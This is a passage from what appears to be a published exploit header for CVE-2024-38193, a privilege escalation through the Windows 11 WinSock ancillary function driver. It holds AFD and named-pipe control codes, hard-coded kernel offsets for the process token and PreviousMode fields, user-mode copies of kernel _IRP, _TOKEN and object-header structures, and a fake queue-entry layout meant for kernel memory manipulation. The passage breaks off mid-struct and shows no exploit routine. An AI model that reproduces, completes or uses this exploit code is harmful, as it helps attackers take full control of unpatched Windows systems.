Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
#pragma once
// Build notes: this unit needs a C++ compiler (alignas, <iostream>, and struct tags
// used as type names without the `struct` keyword further down). ntstatus.h is
// included next to Windows.h without WIN32_NO_STATUS, so STATUS_* macro
// redefinition warnings from the SDK headers are expected.
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")
// High / low 32-bit halves of a 64-bit value.
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
// 15-character extended-attribute name; AFD_CREATE_PACKET::EaName below is sized to
// hold exactly these 15 bytes (no terminator).
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
// Device / file-system control codes written as plain integer literals rather than
// composed with CTL_CODE; the `LL` suffix is used inconsistently (absent on the last one).
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
// Object-attribute flags and create disposition, defined locally because the
// native headers that normally provide them (ntdef.h / winternl.h) are not included.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
// NTSTATUS success test: any non-negative status is success (normally from ntdef.h).
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
// Hard-coded kernel structure offsets for the single build named in the file header.
// Nothing in this unit checks them against the running kernel, so they are only
// valid for that exact build. The OFFSET_IN_TOKEN_* values restate field offsets
// from the _TOKEN definition later in this file.
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
// (HANDLE)-2: the NtCurrentThread pseudo-handle.
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
// User-mode mirror of the kernel IO_STATUS_BLOCK (0x10 bytes on x64).
// NOTE: the `typedef` has no declarator, so only the tag IO_STATUS_BLOCK is
// introduced (MSVC warns about this); the WDK declares Information as ULONG_PTR
// (a byte count), not as a pointer — same width on x64, different meaning.
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status; // NTSTATUS (signed) in the WDK; NT_SUCCESS() casts before testing the sign
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
// Kernel _SYSTEM_POWER_STATE_CONTEXT: the bit-fields total 32 bits
// (8+4+4+4+1+1+1+1+8) and are overlaid on ContextAsUlong.
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
// Kernel _POWER_STATE: one 4-byte slot holding either a system or a device power
// state; both enum types come from winnt.h.
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
// User-mode mirror of the kernel IO_STACK_LOCATION (0x48 bytes). Trailing
// comments give the x64 field offsets the layout is expected to reproduce; the
// several declarations wrapped over two lines below are plain line breaks, not
// separate members.
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
// Per-request arguments; which member applies depends on MajorFunction /
// MinorFunction (WDK contract). Every member starts at offset 0x8.
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
// Completion callback pointer; only the pointer slot matters for the layout.
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
// Kernel _KDEVICE_QUEUE_ENTRY (0x18 bytes); used below as one arm of the
// _IRP::Tail.Overlay union.
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
// Kernel _KAPC (0x58 bytes); used below as one arm of the _IRP::Tail union.
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
// User-mode mirror of the kernel _IRP (0xd0 bytes). IoStatus uses the local
// `struct IO_STATUS_BLOCK` tag defined at the top of this file, whereas UserIosb
// points at `_IO_STATUS_BLOCK`, a different tag that this unit never defines
// (pointer-only use, so it still compiles).
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
// Tail overlays three views of the same 0x58 bytes: the driver-visible Overlay,
// a _KAPC, or a completion key.
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
// TDI transport address entry. Address[1] is presumably a placeholder for
// AddressLength bytes of variable-length data (classic pre-C99 trailing array).
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
// TDI transport address list: TAAddressCount entries; Address[1] is a placeholder
// for the first of them.
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
// Native UNICODE_STRING. Per the documented contract Length and MaximumLength
// are byte counts, not character counts, and Buffer need not be NUL-terminated.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
// Native OBJECT_ATTRIBUTES. Length must be set to sizeof(OBJECT_ATTRIBUTES) by
// the caller (documented contract); no InitializeObjectAttributes helper is
// defined in this unit.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
// One loaded-module record as returned for SystemModuleInformation. Per the
// documented contract OffsetToFileName is the index within FullPathName at which
// the base file name begins.
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
// Header for the SystemModuleInformation buffer: Count entries follow;
// Module[1] is a placeholder for the first one.
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
// One handle record as returned for SystemExtendedHandleInformation
// (0x28 bytes on x64).
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
// Header for the SystemExtendedHandleInformation buffer: NumberOfHandles entries
// follow; Handles[1] is a placeholder for the first one.
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
// An extended-attribute header (first five fields) followed by AFD create
// parameters in one contiguous struct. EaName is 15 bytes, exactly the length of
// the AfdOpenPacket literal above, with no room for a terminating NUL.
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
// Single NtQuery/SetInformationThread class value used by this unit.
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
// NtQuerySystemInformation class values matching the two *_INFORMATION(_EX)
// buffer layouts defined above.
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
// Native event kinds (0 = notification, 1 = synchronization). NOTE: `typedef`
// without a declarator — only the enum tag is introduced (MSVC warns).
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
// Input layout for IOCTL_AFD_BIND as used by this unit: a share type followed by
// an IPv4 socket address (SOCKADDR_IN comes from the Windows headers).
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
// Input layout for IOCTL_AFD_CONNECT as used by this unit. alignas(16) is C++11;
// `sockaddr_in` without the `struct` keyword also requires C++. NOTE: `typedef`
// has no declarator, so only the tag is introduced (MSVC warns). Field meanings
// beyond their names are not established anywhere in this unit.
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
// Layout-only definition: a small header followed by a 0x77FD0-byte (about
// 480 KiB) payload. An object this large must not be placed on the stack.
// NOTE: `typedef` has no declarator, so only the tag is introduced (MSVC warns).
// How the fields are populated is not shown anywhere in this unit.
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
// Input layout for IOCTL_AFD_LISTEN as used by this unit. The ULONG is followed
// by 4 bytes of padding so that the 64-bit field is naturally aligned (16 bytes total).
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
// User-mode mirror of the kernel SECURITY_CLIENT_CONTEXT. The two embedded
// types are winnt.h tags used without the `struct` keyword (C++ only).
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
// Kernel _OWNER_ENTRY (0x10 bytes), embedded in _ERESOURCE below.
// __declspec(align(8)) is MSVC-specific. NOTE: `___u1` contains a double
// underscore and is therefore a reserved identifier in C and C++.
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
// Kernel _ERESOURCE (0x68 bytes); _TOKEN::TokenLock below points at one of these.
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
// Kernel _EX_PUSH_LOCK: a single 8-byte word viewed as flag bits (1+1+1+1+60 = 64),
// a raw value, or a pointer. NOTE: `typedef` has no declarator — only the tag is
// introduced (MSVC warns).
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
// Kernel _SEP_CACHED_HANDLES_TABLE (0x10 bytes). NOTE: `typedef` without a
// declarator — only the tag is introduced (MSVC warns).
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
// Kernel _EX_RUNDOWN_REF: one 8-byte word viewed as a count or a pointer.
// NOTE: `typedef` without a declarator — only the tag is introduced (MSVC warns).
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
// Kernel _OB_HANDLE_REVOCATION_BLOCK (0x20 bytes). NOTE: `typedef` without a
// declarator — only the tag is introduced (MSVC warns).
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
// Kernel _SEP_LOGON_SESSION_REFERENCES (0xc0 bytes). `struct _UNICODE_STRING`
// resolves to the tag defined earlier in this file. NOTE: `typedef` without a
// declarator — only the tag is introduced (MSVC warns).
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
// Kernel _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION (0x30 bytes);
// _TOKEN::pSecurityAttributes below points at one of these.
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
// Kernel _SEP_SID_VALUES_BLOCK (0x20 bytes); referenced from
// _SEP_LOGON_SESSION_REFERENCES and _TOKEN in this file.
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
// Kernel _SEP_TOKEN_PRIVILEGES (0x18 bytes): three 64-bit masks, presumably one
// bit per privilege (not established by anything in this unit).
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
// Kernel _SEP_AUDIT_POLICY (0x1f bytes); _TOKEN_AUDIT_POLICY comes from winnt.h.
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
// User-mode mirror of the kernel _TOKEN (0x498 bytes) for the build named in the
// file header. The OFFSET_IN_TOKEN_* macros at the top of the file restate the
// offsets of Privileges (0x40), PrimaryGroup (0xa8), DynamicPart (0xb0),
// DefaultDacl (0xb8) and VariablePart (0x490) given in the trailing comments here.
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
// Declared void* here although this file also defines _SEP_LOGON_SESSION_REFERENCES.
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof)
// Kernel _OBJECT_HEADER (0x30 bytes of header) with a _TOKEN body appended at
// 0x30, so this definition describes a complete token object, not a generic header.
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
struct _TOKEN Body; //0x30
};
// Bag of pointers and handles shared across the unit. Nothing in this file
// initializes, frees or otherwise uses these fields, so their roles cannot be
// established here beyond their names and types; ownership of the pointed-to
// memory and of the HANDLEs is undocumented. Struct tags (_IRP, _ERESOURCE, ...)
// are used as type names without the `struct` keyword, which requires C++.
struct mm {
void* fake_data_entry;
void* input;
